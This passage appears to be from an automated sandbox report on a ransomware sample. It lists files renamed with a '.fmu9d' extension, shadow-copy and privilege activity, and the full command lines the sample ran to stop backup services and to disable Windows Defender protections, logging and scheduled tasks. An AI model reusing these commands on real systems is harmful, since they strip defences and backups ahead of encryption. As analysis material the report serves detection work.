| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Retail-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_cNKw_qf0ENs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_1ArEvNlE2E80.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_RtBlita_xy80.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Trial-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_CFi9eZpZqbw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\boxed-split.avi | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_ACScJJ_f6ds0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\WordR_Grace-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_Dj_L17njakk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\offsymsl.ttf.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_LGl3-uH_uiM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_4dEjXRrpuNQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_I34Ak0ZbI-M0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\flavormap.properties.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_DBeYSq6_32s0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_rlQy0tLOI5o0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-phn.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_KHzEKTH6Mb40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_zRMoBhpNd180.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_JmSdlk9ZeMI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_3yqDP-VjRNE0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-stil.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_YITotZ8vXPI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MEDIA\CASHREG.WAV.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_icQ-Iw1fzpY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\de-DE\rtscom.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_MF9ElsAtDMM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\plugin.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_-kFX3LjiTcg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_KMS_Client-ul.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_gDi1AfmKlow0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewComment.White@3x.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_8LtOLH_mnlk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_xy8buR5xrsw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_vdVp-Fhv3hc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest2-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_srYJQnnqZCQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_NSNFFUtZpMw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.dll.config.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_Zo6arwmkj4A0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-140.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_x9Oejgf73eQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_9zN3T-f8_8A0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\EssentialReport.dotx.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_32dn4WAdokM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_NROijV3XKCk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcDemoR_BypassTrial365-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_eYiIJ7kf_YE0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_d_WaBF4u2rw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Grace-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_V5xJ9rhRmaY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP\msinfo32.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_bc8croij8Do0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ul-phn.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_2CgErdBlaFM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "vmicvss" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UnistoreSvc_13048" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_13048" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UnistoreSvc_13048" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
